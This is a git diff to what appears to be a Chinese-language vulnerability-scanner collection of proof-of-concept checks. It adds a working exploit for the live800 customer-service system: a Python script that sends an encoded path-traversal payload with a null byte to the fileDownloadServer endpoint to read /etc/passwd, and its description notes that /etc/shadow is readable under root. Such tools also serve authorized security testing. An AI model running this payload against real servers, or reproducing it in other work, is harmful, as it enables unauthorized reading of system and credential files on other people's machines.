diff --git a/cms/cmsmain.py b/cms/cmsmain.py
index df54acc..3277a19 100755
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -93,6 +93,7 @@ from cms.live800.live800_downlog_filedownload import live800_downlog_filedownloa
 from cms.live800.live800_loginAction_sqli import live800_loginAction_sqli_BaseVerify
 from cms.live800.live800_sta_export_sqli import live800_sta_export_sqli_BaseVerify
 from cms.live800.live800_services_xxe import live800_services_xxe_BaseVerify
+from cms.live800.live800_fileDownloadServer_fileread import live800_fileDownloadServer_fileread_BaseVerify
 
 #thinkphp vulns
 from cms.thinkphp.onethink_category_sqli import onethink_category_sqli_BaseVerify
diff --git a/cms/live800/live800_fileDownloadServer_fileread.py b/cms/live800/live800_fileDownloadServer_fileread.py
new file mode 100644
index 0000000..64a2a9c
--- /dev/null
+++ b/cms/live800/live800_fileDownloadServer_fileread.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: live800 fileDownloadServer文件读取漏洞
+referer: unknown
+author: Lucifer
+description: 拼接导致的任意文件读取，root权限可读shadow。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class live800_fileDownloadServer_fileread_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/live800/fileDownloadServer?companyID=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00&fid=3&fna=a&act=1"
+        vulnurl = self.url + payload
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            if r"root:" in req.text and r"/bin/bash" in req.text:
+                cprint("[+]存在live800 fileDownloadServer文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = live800_fileDownloadServer_fileread_BaseVerify(sys.argv[1])
+    testVuln.run()
diff --git a/pocdb.py b/pocdb.py
index e7c9e3e..5e92341 100755
--- a/pocdb.py
+++ b/pocdb.py
@@ -68,6 +68,7 @@ class pocdb_pocs:
             "live800在线客服系统loginAction SQL注入漏洞":live800_loginAction_sqli_BaseVerify(url),
             "live800在线客服系统多处SQL注入GETSHELL漏洞":live800_sta_export_sqli_BaseVerify(url),
             "live800在线客服系统XML实体注入漏洞":live800_services_xxe_BaseVerify(url),
+            "live800 fileDownloadServer文件读取漏洞":live800_fileDownloadServer_fileread_BaseVerify(url),
             "Onethink 参数category SQL注入":onethink_category_sqli_BaseVerify(url),
             "ThinkPHP 代码执行漏洞":thinkphp_code_exec_BaseVerify(url),
             "汇思学习管理系统任意文件下载":wizbank_download_filedownload_BaseVerify(url),
@@ -277,7 +278,6 @@ class pocdb_pocs:
             "正方教务系统services.asmx SQL注入":zfsoft_service_stryhm_sqli_BaseVerify(url),
             "正方教务系统数据库任意操纵":zfsoft_database_control_BaseVerify(url),
             "正方教务系统default3.aspx爆破页面":zfsoft_default3_bruteforce_BaseVerify(url),
-            "V2视频会议系统某处SQL注射、XXE漏洞(可getshell)":v2Conference_sqli_xxe_BaseVerify(url),
             "1039驾校通未授权访问漏洞":jxt1039_unauth_BaseVerify(url),
             "thinksns category模块代码执行":thinksns_category_code_exec_BaseVerify(url),
             "TPshop eval-stdin.php 代码执行漏洞":tpshop_eval_stdin_code_exec_BaseVerify(url),